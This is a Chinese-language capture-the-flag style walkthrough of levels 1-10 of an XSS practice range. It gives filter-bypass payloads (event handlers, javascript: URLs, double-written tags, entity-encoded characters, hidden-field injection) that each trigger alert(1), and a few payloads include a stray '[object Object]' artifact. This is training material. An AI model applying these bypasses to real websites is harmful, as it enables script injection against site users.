专栏首页黑白安全哆啦靶场XSS挑战赛1-10关攻略

哆啦靶场XSS挑战赛1-10关攻略

哆啦集成了网络上常见的靶场与GitHub上比较好的靶场系统,配合一键启动模式,省去你去收集再进行搭建的时间,方便你更加快速的学习信息安全。

该靶场已经正式开源,黑白网去除登录限制重构靶场环境,bachang.heibai.org

正文部分

XSS挑战赛第一关

F12查看了源码发现并没有任何过滤,

<script>alert(1)</script>

XSS挑战赛第二关

查看源码发现<>尖括号无法使用

框内输入

" onmouseover=alert(1)>[object Object]

或者将input文本框提前闭合

"><script>alert(1)</script>[object Object]

XSS挑战赛第三关

和第二关的区别在于代码内多了一句value='".htmlspecialchars($str)."'

无法使用尖括号,so继续使用不用尖括号的弹窗

' onmouseover=alert(1)//

在源码构成

<input name="keyword" value=" " onmouseover="alert(1)//'">

即可

XSS挑战赛第四关

htmlspecialchars+尖括号过滤

在没有尖括号并且语句不被htmlspecialchars()函数影响的情况下

输入

" onclick=alert(1) //

在点击搜索框触发XSS

XSS挑战赛第五关

strreplace 就直接把on转换成 o_n 这样就过滤了js事件但是没过滤尖括号

所以

"><a href=javascript:alert(1)>

即可

点击“>触发

XSS挑战赛第六关

script 转换成 scr_ipt on 转换成 o_n src 转换成 sr_c data 转换成 da_ta href 转换成 hr_ef

但是没有大小写约束

"> <Script>alert(1)</script> //

直接冲冲冲

XSS挑战赛第七关

禁用了大小写同时script,on,src ,data ,href 都直接转换成空。

利用双写绕过

">hello<sscriptcript>alert(1)</sscriptcript>

XSS挑战赛第八关

script 转换成 scr_ipt on 转换成 o_n src 转换成 sr_c data 转换成 da_ta href 转换成 hr_ef 大小写禁用 " 被编码,但是尖括号等符号没有被过滤,输出点在a标签内,href属性中

javascript会被替换成javasc_rpt,我们使用&#x72来代替r

键入

javascrip&#x74;:alert(1)

并点击添加后,再点击友情链接即可触发

XSS挑战赛第九关

查看源码发现不带http://即为不合法提交

javascrip&#x74;:alert(1)//http://heibai.org

键入后点击友情链接即可触发

XSS挑战赛第十关

查看源代码,有get参数有隐藏框

keyword = test&t_sort="type="text" onclick = "alert(1)

直接冲冲冲

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 渗透安全测试的靶场

    新手练习测试通常需要一个测试的漏洞环境,而自己去找指定漏洞的网站显然对于新手来说有点不实际,所以今天我就来给大家提供靶场,也就是各种漏洞测试的网站环境,自行搭建

    网e渗透安全部
  • 万代南梦宫:不想做VR体验店的厂商不是好游戏公司

    VRPinea
  • 万元现金大奖+文末福利|2020腾讯犀牛鸟网络安全T-Star高校挑战赛发布

    ? 导语:为培养优秀网络安全人才,促进网络安全高校人才生态建设,腾讯高校合作中心和腾讯安全应急响应中心(TSRC)于2019年首次共同发起“腾讯犀牛鸟网络安全...

    腾讯高校合作
  • 会议赛事 | 当经典CTF遇上“全栈”云环境,这场比赛到底有多刺激?!

    7月12日22点整,由GeekPwn携手腾讯安全云鼎实验室联合举办的云靶场挑战赛线上热身赛正式落下帷幕。经过36小时的激战,最终老牌战队Nu1L依靠稳定发挥解...

    云鼎实验室
  • CTF入门指南(0基础)

    ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、lin...

    Angel_Kitty
  • 鹅厂实习绿色通道!!!第二届云安全比赛启动,招募“云上”高手

    基于真实通用云环境,展示全路径攻击与防御、开赛38秒提交正确答案……一年前,GeekPwn2019云安全比赛的精彩画面记忆犹新,而即将开始的第二届云安全比赛——...

    腾讯安全
  • GeekPwn 2020云靶场挑战赛报名倒计时1天!欢迎顶尖“云上CTFer”踢馆

    7月11-12日,第二届GeekPwn云靶场挑战赛线上热身赛战火将重燃“云上”,再过1天就将失去了报名机会!你还不赶紧行动报名?

    腾讯安全
  • 赛前重点|考官揭秘GeekPwn云靶场挑战赛关键点

    7月11日-12日,第二届GeekPwn云靶场挑战赛线上热身赛正式开赛。今年的比赛相较往年来说,无论是赛制、赛程还是奖励等方面,都会有明显的不同。对于选手们而...

    云鼎实验室
  • [红日安全]Web安全Day2 - XSS跨站实战攻防

    大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ...

    红日安全
  • 云靶场、实战攻防、前沿趋势...本届云安全挑战赛的看点都在这里

    10月24日,由腾讯安全云鼎实验室联合GeekPwn发起的第二届云安全比赛在上海落下帷幕,包括Nu1L、r3kapig、NeSE、0ops、天枢 Dubhe等7...

    腾讯安全
  • 第二届云安全挑战赛落幕,九大云安全趋势重磅发布

    10月24日,由腾讯安全云鼎实验室联合GeekPwn发起的第二届云安全比赛在上海落下帷幕,包括Nu1L、r3kapig、NeSE、0ops、天枢 Dubhe等...

    云鼎实验室
  • 第二届云安全挑战赛落幕,九大云安全趋势重磅发布

    10月24日,由腾讯安全云鼎实验室联合GeekPwn发起的第二届云安全比赛在上海落下帷幕,包括Nu1L、r3kapig、NeSE、0ops、天枢 Dubhe等7...

    腾讯安全
  • 靶场发展态势③美国防部赛博安全靶场(IAR/CSR)

    美国国防部在2018年依据美国白宫公布的《国家网络战略》(National CyberStrategy),制定其《国防部网络战略》(Department ofD...

    时间之外沉浮事
  • 商业网络培训靶场的形态及思考

    这是一篇讲述商业网络培训靶场应用形态及延伸思考的文章。在前文《商业网络培训靶场的发展态势综述》中,我们已经大致探讨了商业网络培训靶场当前的发展态势。这些发展态势...

    时间之外沉浮事
  • 拒绝boring,炫酷潮AI竞赛来袭!

    韩梅梅 听说,上周AI界发生了一件大事? 李雷 对,李开复、王小川、张一鸣组了一个AI Challenger全球AI挑战赛,吸引了65个国家,1万多AI界武林高...

    企鹅号小编
  • CTF是个啥?扫盲笔记带你一探究竟!

    CTF全称“Capture the FLAG”,俗称夺旗(flag)比赛,起源于1996年举办的DEFCON全球黑客大会,随着安全攻防技术的发展,...

    轩辕小子
  • 信安之路从零到一

    俗话说:未知攻 焉知防,随着网络安全事件不断的发生,就在 2017 年 5 月 12 日起,全球范围内爆发的基于 Windows 网络共享协议进行攻击传播的蠕虫...

    信安之路
  • 如何踏入信安之路

    俗话说:未知攻 焉知防,随着网络安全事件不断的发生,就在 2017 年 5 月 12 日起,全球范围内爆发的基于 Windows 网络共享协议进行攻击传播的蠕虫...

    C4rpeDime
  • 工业网络靶场技术解析①序言

    最近发生的委内瑞拉电力系统瘫痪事件表明,这是一种国家间新型战争,企图通过网络攻击行动瓦解国家运行基础,瘫痪民生设施,彻底瓦解民心,从而“手不血刃”达到目的。如果...

    时间之外沉浮事

扫码关注云+社区

领取腾讯云代金券